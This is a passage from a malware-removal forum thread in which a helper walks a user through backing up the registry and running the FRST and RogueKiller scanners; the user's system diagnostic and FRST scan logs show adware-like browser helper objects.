Processor: AMD Phenom(tm) II X6 1065T Processor | CPU 1 | 783/200mhz
.
==== Disk Partitions =========================
.
C: is FIXED (NTFS) - 1379 GiB total, 1194.133 GiB free.
D: is CDROM ()
E: is Removable
G: is Removable
H: is Removable
I: is Removable
J: is Removable
K: is Removable
.
==== Disabled Device Manager Items =============
.
Class GUID: {8ECC055D-047F-11D1-A537-0000F8753ED1}
Description: qknfd
Device ID: ROOT\LEGACY_QKNFD\0000
Manufacturer:
Name: qknfd
PNP Device ID: ROOT\LEGACY_QKNFD\0000
Service: qknfd
.
==== System Restore Points ===================
.
RP279: 12/26/2014 11:31:46 AM - Windows Update
RP280: 12/29/2014 9:47:33 PM - Windows Update
RP281: 1/3/2015 6:23:04 AM - Windows Update
RP282: 1/7/2015 9:49:21 AM - Windows Update
RP283: 1/10/2015 2:16:34 PM - Windows Update
RP284: 1/13/2015 7:50:59 AM - Windows Update
RP285: 1/14/2015 10:39:23 PM - Windows Update
RP286: 1/14/2015 11:09:50 PM - Configured MediaEspresso
.
==== Installed Programs ======================
.
Adobe AIR
Adobe Flash Player 16 ActiveX
Adobe Flash Player 16 NPAPI
Adobe Reader X (10.1.13) MUI
Adobe Refresh Manager
Agatha Christie - Death on the Nile
Amazon MP3 Downloader 1.0.17
AMD DnD V1.0.20
Apple Application Support
Apple Mobile Device Support
Apple Software Update
ATI AVIVO64 Codecs
ATI Catalyst Install Manager
Bejeweled 2 Deluxe
Bonjour
Brother MFL-Pro Suite DCP-7065DN
Build-a-lot 4 - Power Source
CANON iMAGE GATEWAY MyCamera Download Plugin
CANON iMAGE GATEWAY Task for ZoomBrowser EX
Canon Internet Library for ZoomBrowser EX
Canon MovieEdit Task for ZoomBrowser EX
Canon Utilities ImageBrowser EX
Canon Utilities ZoomBrowser EX
Catalyst Control Center - Branding
Catalyst Control Center Core Implementation
Catalyst Control Center Graphics Full Existing
Catalyst Control Center Graphics Full New
Catalyst Control Center Graphics Light
Catalyst Control Center Graphics Previews Vista
Catalyst Control Center InstallProxy
Catalyst Control Center Localization All
ccc-core-static
ccc-utility64
CCC Help Chinese Standard
CCC Help Chinese Traditional
CCC Help Czech
CCC Help Danish
CCC Help Dutch
CCC Help English
CCC Help Finnish
CCC Help French
CCC Help German
CCC Help Greek
CCC Help Hungarian
CCC Help Italian
CCC Help Japanese
CCC Help Korean
CCC Help Norwegian
CCC Help Polish
CCC Help Portuguese
CCC Help Russian
CCC Help Spanish
CCC Help Swedish
CCC Help Thai
CCC Help Turkish
Chronicles of Albian
Cradle of Rome 2
CyberLink MediaEspresso
CyberLink PowerDVD 10
D3DX10
Definition Update for Microsoft Office 2010 (KB2910899) 32-Bit Edition
Dora's World Adventure
eBay Worldwide
FamilySearch Indexing 3.13.1
Final Drive: Nitro
FromDocToPDF Internet Explorer Toolbar
Galerie de photos Windows Live
Gateway Games
Gateway Recovery Management
Gateway Registration
Gateway ScreenSaver
Gateway Updater
Governor of Poker 2 Premium Edition
Hotkey Utility
HP LaserJet 1020 Series
HP Support Solutions Framework
Identity Card
iTunes
Jewel Match 3
Junk Mail filter update
Kaspersky Internet Security
Malwarebytes Anti-Malware version 2.0.4.1028
Mesh Runtime
Microsoft .NET Framework 1.1
Microsoft .NET Framework 4.5.2
Microsoft Application Error Reporting
Microsoft Office 2010
Microsoft Office Access MUI (English) 2010
Microsoft Office Access Setup Metadata MUI (English) 2010
Microsoft Office Excel MUI (English) 2010
Microsoft Office Groove MUI (English) 2010
Microsoft Office InfoPath MUI (English) 2010
Microsoft Office Office 64-bit Components 2010
Microsoft Office OneNote MUI (English) 2010
Microsoft Office Outlook MUI (English) 2010
Microsoft Office PowerPoint MUI (English) 2010
Microsoft Office Professional Plus 2010
Microsoft Office Proof (English) 2010
Microsoft Office Proof (French) 2010
Microsoft Office Proof (Spanish) 2010
Microsoft Office Proofing (English) 2010
Microsoft Office Publisher MUI (English) 2010
Microsoft Office Shared 64-bit MUI (English) 2010
Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2010
Microsoft Office Shared MUI (English) 2010
Microsoft Office Shared Setup Metadata MUI (English) 2010
Microsoft Office Word MUI (English) 2010
Microsoft Silverlight
Microsoft SQL Server 2005 Compact Edition [ENU]
Microsoft Visual C++ 2005 Redistributable
Microsoft Visual C++ 2005 Redistributable (x64)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219
Microsoft Web Publishing Wizard 1.52
Mozilla Firefox 34.0.5 (x86 en-US)
Mozilla Maintenance Service
MSVCRT
MSVCRT_amd64
MSXML 4.0 SP2 (KB954430)
MSXML 4.0 SP2 (KB973688)
MSXML 4.0 SP3 Parser
MSXML 4.0 SP3 Parser (KB2758694)
Mystery of Mortlake Mansion
NEF Codec
Nero BackItUp 10
Nero BackItUp 10 Help (CHM)
Nero Control Center 10
Nero ControlCenter 10 Help (CHM)
Nero Core Components 10
Nero DiscSpeed 10
Nero DiscSpeed 10 Help (CHM)
Nero Express 10
Nero Express 10 Help (CHM)
Nero Multimedia Suite 10 Essentials
Nero RescueAgent 10
Nero RescueAgent 10 Help (CHM)
Nero StartSmart 10
Nero StartSmart 10 Help (CHM)
Nero Update
NOOK for PC
Norton Online Backup
Nuance PaperPort 12
Nuance PDF Viewer Plus
OLYMPUS Raw Codec
PaperPort Image Printer 64-bit
Penguins!
Personal Ancestral File 5
Personal Ancestral File 5  Lessons
Plants vs. Zombies - Game of the Year
Polar Bowler
Polar Golfer
Realtek High Definition Audio Driver
Reference Point Software Template for APA format, Word 2010
Reference Point Template ver: Word 2010, APA 6th Ed.
RootsMagic 6.3.0.2
Scansoft PDF Professional
Security Update for Microsoft Excel 2010 (KB2910902) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2553154) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2553284) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2687423) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2810073) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2850016) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2880971) 32-Bit Edition
Security Update for Microsoft Office 2010 (KB2881071) 32-Bit Edition
Security Update for Microsoft Word 2010 (KB2899519) 32-Bit Edition
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition
Skype™ 6.11
The Print Shop 23.1
Torchlight
TurboTax 2012
TurboTax 2012 widiper
TurboTax 2012 WinPerFedFormset
TurboTax 2012 WinPerReleaseEngine
TurboTax 2012 WinPerTaxSupport
TurboTax 2012 wrapper
TurboTax 2013
TurboTax 2013 widiper
TurboTax 2013 WinPerFedFormset
TurboTax 2013 WinPerReleaseEngine
TurboTax 2013 WinPerTaxSupport
TurboTax 2013 wrapper
Update for Microsoft Access 2010 (KB2553446) 32-Bit Edition
Update for Microsoft Excel 2010 (KB2589348) 32-Bit Edition
Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition
Update for Microsoft InfoPath 2010 (KB2817369) 32-Bit Edition
Update for Microsoft InfoPath 2010 (KB2817396) 32-Bit Edition
Update for Microsoft Office 2010 (KB2553140) 32-Bit Edition
Update for Microsoft Office 2010 (KB2589298) 32-Bit Edition
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition
Update for Microsoft Office 2010 (KB2589375) 32-Bit Edition
Update for Microsoft Office 2010 (KB2589386) 32-Bit Edition
Update for Microsoft Office 2010 (KB2597087) 32-Bit Edition
Update for Microsoft Office 2010 (KB2597089) 32-Bit Edition
Update for Microsoft Office 2010 (KB2687275) 32-Bit Edition
Update for Microsoft Office 2010 (KB2760631) 32-Bit Edition
Update for Microsoft Office 2010 (KB2794737) 32-Bit Edition
Update for Microsoft Office 2010 (KB2825635) 32-Bit Edition
Update for Microsoft Office 2010 (KB2825640) 32-Bit Edition
Update for Microsoft Office 2010 (KB2837581) 32-Bit Edition
Update for Microsoft Office 2010 (KB2837602) 32-Bit Edition
Update for Microsoft Office 2010 (KB2837606) 32-Bit Edition
Update for Microsoft Office 2010 (KB2883019) 32-Bit Edition
Update for Microsoft Office 2010 (KB2889818) 32-Bit Edition
Update for Microsoft Office 2010 (KB2889828) 32-Bit Edition
Update for Microsoft Office 2010 (KB2910896) 32-Bit Edition
Update for Microsoft OneNote 2010 (KB2597088) 32-Bit Edition
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition
Update for Microsoft PowerPoint 2010 (KB2880517) 32-Bit Edition
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 32-Bit Edition
Update for Microsoft Visio 2010 (KB2880526) 32-Bit Edition
Update for Microsoft Visio Viewer 2010 (KB2837587) 32-Bit Edition
Update Installer for WildTangent Games App
Virtual Villagers 5 - New Believers
Welcome Center
WildTangent Games App (Gateway Games)
Windows Live
Windows Live Communications Platform
Windows Live Essentials
Windows Live ID Sign-in Assistant
Windows Live Installer
Windows Live Language Selector
Windows Live Mail
Windows Live Mesh
Windows Live Messenger
Windows Live MIME IFilter
Windows Live Movie Maker
Windows Live Photo Common
Windows Live Photo Gallery
Windows Live PIMT Platform
Windows Live Remote Client
Windows Live Remote Client Resources
Windows Live Remote Service
Windows Live Remote Service Resources
Windows Live SOXE
Windows Live SOXE Definitions
Windows Live UX Platform
Windows Live UX Platform Language Pack
Windows Live Writer
Windows Live Writer Resources
Zuma's Revenge
.
==== Event Viewer Messages From Past Week ========
.
1/16/2015 9:25:17 PM, Error: Microsoft-Windows-HAL [12]  - The platform firmware has corrupted memory across the previous system power transition.  Please check for updated firmware for your system.
1/16/2015 8:55:19 PM, Error: Service Control Manager [7026]  - The following boot-start or system-start driver(s) failed to load:  BHDrvx64 qknfd
1/16/2015 8:55:03 PM, Error: Service Control Manager [7009]  - A timeout was reached (30000 milliseconds) while waiting for the HP Support Solutions Framework Service service to connect.
1/16/2015 8:55:03 PM, Error: Service Control Manager [7000]  - The HP Support Solutions Framework Service service failed to start due to the following error:  The service did not respond to the start or control request in a timely fashion.
1/13/2015 7:30:25 AM, Error: Service Control Manager [7011]  - A timeout (30000 milliseconds) was reached while waiting for a transaction response from the ShellHWDetection service.
1/11/2015 6:28:44 PM, Error: Disk [11]  - The driver detected a controller error on \Device\Harddisk6\DR6.
.
==== End Of File ===========================


Thank you in advance for your help.
« Last Edit: January 28, 2015, 07:59:13 AM by kevinf80 »



Offline kevinf80

  • Malware Removal Staff
  • Diamond Member
  • Posts: 7656
Re: [Resolved - K] Pop ups
« Reply #1 on: January 17, 2015, 05:04:20 PM »
Hello and welcome to SpywareHammer

Follow the instructions in the link below to show hidden files:

http://www.bleepingcomputer.com/tutorials/how-to-see-hidden-files-in-windows/

Next,

Backup the Registry:

Modifying the Registry can create unforeseen problems, so it's always wise to create a backup before doing so.

  • Please download ERUNT from one of the following links: Link1 | Link2 | Link3
  • ERUNT (Emergency Recovery Utility NT) is a free program that allows you to keep a complete backup of your registry and restore it when needed.
  • Double click on erunt-setup.exe to Install ERUNT by following the prompts.
  • NOTE: Do not choose to allow ERUNT to add an Entry to the Startup folder. Click NO.
  • Start ERUNT either by double clicking on the desktop icon or choosing to start the program at the end of the setup process.
  • Choose a location for the backup.
  • Note: the default location is C:\Windows\ERDNT which is acceptable.

  • Make sure that "System registry" and "Current user Registry"  check boxes are selected.
  • Click on OK
  • Then click on YES to create the folder.
  • Note: if it is necessary to restore the registry, open the backup folder and start ERDNT.exe
Next,

Any importand data, videos, music, pictures etc that you cannot afford to lose should be backed up if not already done. Go to the following link for basic help/instructions:

https://forums.malwarebytes.org/index.php?/topic/136226-backup-software/

Next,

Run the following scans and post the produced logs:

Step 1

Download Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatible with your system (32 bit or 64 bit). If you are not sure which version applies to your system download both of them and try to run them. Only one of them will run on your system, that will be the right version.
  • Double-click to run it. When the tool opens click Yes to disclaimer.
  • Press Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please copy and paste it to your reply.
  • The first time the tool is run, it makes also another log (Addition.txt). Please attach it to your reply.
Step 2

Please download RogueKiller and save it to your desktop from the following link: http://www.bleepingcomputer.com/download/roguekiller/

  • Quit all running programs.
  • For Windows XP, double-click to start.
  • For Vista,Windows 7/8, Right-click on the program and select Run as Administrator to start and when prompted allow it to run.
  • Read and accept the EULA (End User Licene Agreement)
  • Click Scan to scan the system.
  • When the scan completes select "Report", log will open. Close the program > Don't Fix anything!
  • Post back the report which should also be located here:

C:\Programdata\RogueKiller\Logs <-------- W7/8
C:\Documents and Settings\All Users\Application Data\RogueKiller\Logs <------XP

Thank you,

Kevin...

Offline kevinf80

  • Malware Removal Staff
  • Diamond Member
  • Posts: 7656
Re: [Resolved - K] Pop ups
« Reply #2 on: January 20, 2015, 01:34:28 AM »
Do you still need help?

Offline kobra

  • Bronze Member
  • Posts: 18
Re: [Resolved - K] Pop ups
« Reply #3 on: January 21, 2015, 12:42:13 AM »
Yes, I'm sorry, it took me a while to take a backup.

Here are the result of the scans.

FRST.txt:
Scan result of Farbar Recovery Scan Tool (FRST.txt) (x64) Version: 19-01-2015
Ran by Admin (administrator) on LAWRENCE2 on 20-01-2015 23:22:34
Running from C:\Users\Admin\Desktop
Loaded Profiles: Bonnie & Admin (Available profiles: Bonnie & Admin)
Platform: Windows 7 Home Premium Service Pack 1 (X64) OS Language: English (United States)
Internet Explorer Version 11 (Default browser: IE)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Kaspersky Lab ZAO) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avp.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Acer Incorporated) C:\Program Files (x86)\Gateway\Registration\GREGsvc.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe
(Acer Incorporated) C:\Program Files\Gateway\Gateway Updater\UpdaterService.exe
(Symantec Corporation) C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuAgent.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe
(Intuit Inc.) C:\Program Files (x86)\Common Files\Intuit\Update Service v4\IntuitUpdateService.exe
(Nero AG) C:\Program Files (x86)\Nero\Update\NASvc.exe
(Kaspersky Lab ZAO) C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avpui.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Acresso Corporation) C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe
(Microsoft Corporation) C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE
(Spotify Ltd) C:\Users\Bonnie\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe
() C:\Program Files (x86)\Canon\ImageBrowser EX\MFManager.exe
(Dropbox, Inc.) C:\Users\Bonnie\AppData\Roaming\Dropbox\bin\Dropbox.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe
() C:\Program Files (x86)\Gateway\Hotkey Utility\HotkeyUtility.exe
(Apple Inc.) C:\Program Files (x86)\iTunes\iTunesHelper.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfPro5Hook.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCtrlCntr.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\BrYNSvc.exe
(Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCcUxSys.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Advanced Micro Devices Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\MOM.exe
(ATI Technologies Inc.) C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CCC.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe


==================== Registry (Whitelisted) ==================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RtHDVCpl] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [10060320 2010-02-09] (Realtek Semiconductor)
HKLM-x32\...\Run: [Norton Online Backup] => C:\Program Files (x86)\Symantec\Norton Online Backup\NOBuClient.exe [1155928 2010-06-01] (Symantec Corporation)
HKLM-x32\...\Run: [StartCCC] => C:\Program Files (x86)\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe [98304 2010-02-10] (Advanced Micro Devices, Inc.)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [87336 2010-02-03] (CyberLink Corp.)
HKLM-x32\...\Run: [Hotkey Utility] => C:\Program Files (x86)\Gateway\Hotkey Utility\HotkeyUtility.exe [627304 2011-08-10] ()
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-09-13] (Apple Inc.)
HKLM-x32\...\Run: [iTunesHelper] => C:\Program Files (x86)\iTunes\iTunesHelper.exe [152392 2013-11-02] (Apple Inc.)
HKLM-x32\...\Run: [IndexSearch] => C:\Program Files (x86)\Nuance\PaperPort\IndexSearch.exe [46368 2010-03-09] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [PaperPort PTD] => C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe [29984 2010-03-09] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [PPort12reminder] => C:\Program Files (x86)\Nuance\PaperPort\Ereg\Ereg.exe [328992 2010-02-09] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [PDFHook] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfpro5hook.exe [636192 2010-03-05] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [PDF5 Registry Controller] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\RegistryController.exe [62752 2010-03-05] (Nuance Communications, Inc.)
HKLM-x32\...\Run: [ControlCenter4] => C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe [143360 2012-09-06] (Brother Industries, Ltd.)
HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [3076096 2012-06-06] (Brother Industries, Ltd.)
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe [222496 2009-05-05] (Acresso Corporation)
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\...\Run: [OfficeSyncProcess] => C:\Program Files (x86)\Microsoft Office\Office14\MSOSYNC.EXE [720064 2014-10-14] (Microsoft Corporation)
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\...\Run: [Spotify Web Helper] => C:\Users\Bonnie\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe [1676344 2014-12-11] (Spotify Ltd)
HKU\S-1-5-21-2977827394-2594518940-965070511-1008\...\RunOnce: [ScrSav] => C:\Program Files (x86)\Gateway\Screensaver\run_Gateway.exe [154144 2010-07-29] ()
HKU\S-1-5-18\...\RunOnce: [SpUninstallDeleteDir] => rmdir /s /q "\SearchProtect"
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Event Reminder.lnk
ShortcutTarget: Event Reminder.lnk -> C:\Program Files (x86)\The Print Shop 23.1\Remind.exe (Broderbund Properties LLC)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ImageBrowser EX Agent.lnk
ShortcutTarget: ImageBrowser EX Agent.lnk -> C:\Program Files (x86)\Canon\ImageBrowser EX\MFManager.exe ()
Startup: C:\Users\Bonnie\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Dropbox.lnk
ShortcutTarget: Dropbox.lnk -> C:\Users\Admin\AppData\Roaming\Dropbox\bin\Dropbox.exe (No File)
ShellIconOverlayIdentifiers: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers: [DropboxExt4] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: [DropboxExt1] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: [DropboxExt2] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} =>  No File
ShellIconOverlayIdentifiers-x32: [DropboxExt3] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} =>  No File
CHR HKLM\SOFTWARE\Policies\Google: Policy restriction <======= ATTENTION

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Policy restriction <======= ATTENTION
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Internet Explorer\Main,Search Page = http://www.microsoft.com/isapi/redir.dll?prd=ie&ar=iesearch
HKU\S-1-5-21-2977827394-2594518940-965070511-1000\Software\Microsoft\Internet Explorer\Main,SearchMigratedDefaultURL = http://www.google.com/search?q={searchTerms}&sourceid=ie7&rls=com.microsoft:en-US&ie=utf8&oe=utf8
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://search.live.com/results.aspx?q={searchTerms}&src={referrer:source?}
SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search?q={searchTerms}&form=AGWTDF&pc=MAGW&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = http://www.bing.com/search?q={searchTerms}&form=AGWTDF&pc=MAGW&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {9a216821-0ec5-49a3-85ac-fb72ae79a1e8} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^Y6^xdm003^S06927^us&si=CPC7u9_BzrkCFeqDQgodWCsAaw&ptb=7591A84B-239C-40EE-A83E-84C8EA746CC3&ind=2013091522&n=77fd56c2&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-2977827394-2594518940-965070511-1000 -> {30BFC086-8BB7-466F-8E12-0A89A3B33C6C} URL = http://start.mysearchdial.com/results.php?f=4&q={searchTerms}&a=dsites&cd=2XzuyEtN2Y1L1QzutAzzyCtDyByByD0D0Fzz0F0D0D0CyD0AtN0D0Tzu0SyBzyyDtN1L2XzutBtFtCyBtFtDtFtCtN1L1CzutDtBtCtC1V1PtN1L1G1B1V1N2Y1L1Qzu2SyEtDyEyCyE0FyByBtGyB0CtAtBtGtDtAyEzytG0FyC0F0FtGyCyDzy0F0BtDyEyDtD0AyCyD2QtN1M1F1B2Z1V1N2Y1L1Qzu2SyCyB0CyDyCzz0DzztG0B0FyCyDtGtBtDzyyEtGtCtDzyyDtGtDtB0E0CyByCtCyC0CzzyBtA2Q&cr=1308762248&ir=
SearchScopes: HKU\S-1-5-21-2977827394-2594518940-965070511-1000 -> {47287947-90A5-41BC-A98B-24214FA5ECE9} URL = https://search.yahoo.com/search?fr=mcafee&type=B010US739D20120919&p={SearchTerms}
SearchScopes: HKU\S-1-5-21-2977827394-2594518940-965070511-1000 -> {55D8CC73-D9F8-4F92-8EAE-0081BE423565} URL = http://search.conduit.com/ResultsExt.aspx?q={searchTerms}&SearchSource=4&ctid=CT3196716
SearchScopes: HKU\S-1-5-21-2977827394-2594518940-965070511-1000 -> {88BA080D-DF1A-45D2-8CE2-8461E30FBFFE} URL = http://search.netzero.net/search?action=search&source=browserboxapp&query={searchTerms}
SearchScopes: HKU\S-1-5-21-2977827394-2594518940-965070511-1000 -> {96bd48dd-741b-41ae-ac4a-aff96ba00f7e} URL = http://search.coupons.com/search.asp?p=df&q={searchTerms}
SearchScopes: HKU\S-1-5-21-2977827394-2594518940-965070511-1000 -> {9a216821-0ec5-49a3-85ac-fb72ae79a1e8} URL = http://search.tb.ask.com/search/GGmain.jhtml?p2=^Y6^xdm003^S06927^us&si=CPC7u9_BzrkCFeqDQgodWCsAaw&ptb=7591A84B-239C-40EE-A83E-84C8EA746CC3&ind=2013091522&n=77fd56c2&psa=&st=sb&searchfor={searchTerms}
BHO: caoupoNpEaK -> {01050D05-D546-B8DC-954D-8334A8A7BF5A} -> C:\ProgramData\caoupoNpEaK\_1Y.x64.dll No File
BHO: AudioCeonvaeert -> {2F344960-763E-9E6C-E973-25241A34D54E} -> C:\ProgramData\AudioCeonvaeert\mRE8_SdP.x64.dll No File
BHO: DiscounntLoCaatOr -> {39dd84e0-d7e2-4b5c-88df-6bfebdce6716} -> C:\ProgramData\DiscounntLoCaatOr\4hvGyEzAwMBtBM.x64.dll ()
BHO: Content Blocker Plugin -> {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\ContentBlocker\ie_content_blocker_plugin.dll (Kaspersky Lab ZAO)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO: Virtual Keyboard Plugin -> {73455575-E40C-433C-9784-C78DC7761455} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll (Kaspersky Lab ZAO)
BHO: Windows Live ID Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll (Microsoft Corp.)
BHO: Safe Money Plugin -> {9E6D0D23-3D72-4A94-AE1F-2D167624E3D9} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\OnlineBanking\online_banking_bho.dll (Kaspersky Lab ZAO)
BHO: SaoftiCoup -> {b2ba0648-6833-4057-aaa1-bf9c473dd360} -> C:\ProgramData\SaoftiCoup\HDwI4jNxyFjYaK.x64.dll ()
BHO: PrinCECCoupon -> {B4552D3D-6B41-9AF1-3067-72A066972344} -> C:\ProgramData\PrinCECCoupon\jsih.x64.dll No File
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL (Microsoft Corporation)
BHO: URL Advisor Plugin -> {E33CF602-D945-461A-83F0-819F76A199F8} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\x64\IEExt\UrlAdvisor\klwtbbho.dll (Kaspersky Lab ZAO)
BHO-x32: MSS+ Identifier -> {0E8A89AD-95D7-40EB-8D9D-083EF7066A01} -> C:\Program Files\McAfee Security Scan\3.8.130\McAfeeMSS_IE.dll No File
BHO-x32: No Name -> {39dd84e0-d7e2-4b5c-88df-6bfebdce6716} ->  No File
BHO-x32: PlusIEEventHelper Class -> {551A852F-39A6-44A7-9C13-AFBEC9185A9D} -> C:\Program Files (x86)\Nuance\PDF Viewer Plus\Bin\PlusIEContextMenu.dll (Zeon Corporation)
BHO-x32: Content Blocker Plugin -> {5564CC73-EFA7-4CBF-918A-5CF7FBBFFF4F} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\ContentBlocker\ie_content_blocker_plugin.dll (Kaspersky Lab ZAO)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL (Microsoft Corporation)
BHO-x32: Virtual Keyboard Plugin -> {73455575-E40C-433C-9784-C78DC7761455} -> C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\IEExt\VirtualKeyboard\ie_virtual_keyboard_plugin.dll (Kaspersky Lab ZAO)
